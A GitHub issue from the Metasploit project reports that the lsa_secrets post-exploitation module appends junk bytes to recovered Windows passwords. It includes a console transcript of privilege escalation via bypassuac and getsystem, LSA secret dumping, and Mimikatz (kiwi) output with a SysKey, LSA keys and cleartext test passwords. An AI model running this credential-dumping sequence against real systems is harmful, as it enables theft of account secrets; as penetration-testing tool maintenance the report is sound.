Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

post/windows/gather/lsa_secrets appends junk data to passwords #10390

Open
bcoles opened this issue Jul 29, 2018 · 3 comments
Open

post/windows/gather/lsa_secrets appends junk data to passwords #10390

bcoles opened this issue Jul 29, 2018 · 3 comments
Labels
bug confirmed Issues confirmed by a committer not-stale Label to stop an issue from being auto closed

Comments

@bcoles
Copy link
Contributor

bcoles commented Jul 29, 2018

A report on Twitter indicates that lsadump on Metasploit is broken.

Initial tests revealed a bug. No idea if it's the same issue @craigsblackie ?

Junk bytes are appended to recovered passwords. Observe the output below. The passwords are password and redacted, where as the module returns password |\~ and redactedC[+ QE

Test system in Windoes 7 SP1 x64; with session upgraded via exploit/windows/local/bypassuac and getsystem. Metasploit is latest version from git, running on Ruby 2.3.0.

msf5 exploit(windows/local/bypassuac) > use post/windows/gather/lsa_secrets 
msf5 post(windows/gather/lsa_secrets) > set session 2
session => 2
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[-] Could not retrieve LSA key. Are you SYSTEM?
[*] Post module execution completed
msf5 post(windows/gather/lsa_secrets) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 2? [y/N]  
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[+] Key: DefaultPassword
 Decrypted Value: password |\~

[+] Key: DPAPI_SYSTEM
 Decrypted Value: ,?<lJ.f$*qghGuf2H

[+] Key: _SC_MSSQL$SQLEXPRESS
 Username: NT Service\MSSQL$SQLEXPRESS 
 Decrypted Value: M"Y=aD

[+] Key: _SC_MSSQLSERVER
 Username: NT Service\MSSQLSERVER 
 Decrypted Value: _;N5kN.

[+] Key: _SC_redacted
 Username: .\redacted 
 Decrypted Value:  redactedC[+ QE

[*] Writing to loot...
[*] Data saved in: /root/.msf4/loot/20180728232749_default_172.16.191.153_registry.lsa.sec_660233.txt
[*] Post module execution completed

Compared to kiwi lsa_dump_secrets which returns the correct value.

meterpreter > lsa_dump_secrets 
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN-SGBSD5TQUTQ
SysKey : 9f288f41951f8dedc8c2011fcef7627f

Local name : WIN-SGBSD5TQUTQ ( S-1-5-21-3721788700-3134539918-2111365127 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {b76bab56-d62d-7863-136e-0a0c1ca4bb73}
  [00] {b76bab56-d62d-7863-136e-0a0c1ca4bb73} 6afee2d5c13d317fe515c521f7c165180feba991f27dd8212d6ce93c68383da0

Secret  : DefaultPassword
cur/text: password
old/text: ROOT#123

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 1d 01 9d 3f 3c 80 6c dc 4a 2e d6 66 24 a0 04 af c2 07 2a d8 71 67 13 99 68 ed 47 75 66 32 b9 12 7f 48 c4 f9 a0 be 04 02 
    full: 1d019d3f3c806cdc4a2ed66624a004afc2072ad87167139968ed47756632b9127f48c4f9a0be0402
    m/u : 1d019d3f3c806cdc4a2ed66624a004afc2072ad8 / 7167139968ed47756632b9127f48c4f9a0be0402
old/hex : 01 00 00 00 c9 22 d6 0b 83 9e dd 98 a7 ad 7a 5a c5 ff 4e bb 8a d2 6f 01 61 be bf d4 bc 70 54 70 fd df 46 12 a8 c5 e5 2d 98 6c 79 71 
    full: c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f0161bebfd4bc705470fddf4612a8c5e52d986c7971
    m/u : c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f01 / 61bebfd4bc705470fddf4612a8c5e52d986c7971

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT Service\MSSQL$SQLEXPRESS

Secret  : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : NT Service\MSSQLSERVER

Secret  : _SC_redacted / service 'redacted' with username : .\redacted
cur/text: redacted
@bcoles bcoles added the bug label Jul 29, 2018
@craigsblackie
Copy link

Yes, this is the same issue I experienced. Should have submitted this myself, thanks for stepping in!

@github-actions
Copy link

github-actions bot commented Dec 2, 2020

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 2, 2020
@bcoles bcoles added not-stale Label to stop an issue from being auto closed and removed Stale Marks an issue as stale, to be closed if no action is taken labels Dec 2, 2020
@bcoles
Copy link
Contributor Author

bcoles commented Dec 2, 2020
edited

Removing the stale label. I'm not sure if this is still an issue. Still an issue in 2022. Someone who isn't me should probably take a look at this.

@bcoles bcoles added the confirmed Issues confirmed by a committer label Aug 14, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug confirmed Issues confirmed by a committer not-stale Label to stop an issue from being auto closed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bcoles @craigsblackie